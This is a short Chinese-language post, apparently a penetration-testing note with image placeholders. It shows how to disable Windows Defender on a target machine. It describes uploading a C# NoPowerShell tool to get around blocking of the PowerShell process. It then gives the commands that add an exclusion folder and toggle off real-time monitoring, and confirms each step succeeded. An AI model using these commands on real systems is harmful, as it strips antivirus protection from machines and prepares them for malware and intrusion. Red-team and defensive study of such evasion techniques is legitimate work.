添加排除项

image.png
首先我们看到只有一个排除选项

上传C#版本的nopowershell,绕过拦截powershell进程
image.png

image.png


Add-MpPreference -ExclusionPath “C:\ttt\”

执行
image.png
image.png
发现已经填入成功

关闭windows defender

  1. $preferences = Get-MpPreference;Set-MpPreference -DisableRealtimeMonitoring (!$preferences.DisableRealtimeMonitoring)

image.png
开启状态

image.png
执行
image.png
image.png
发现windows defender已关闭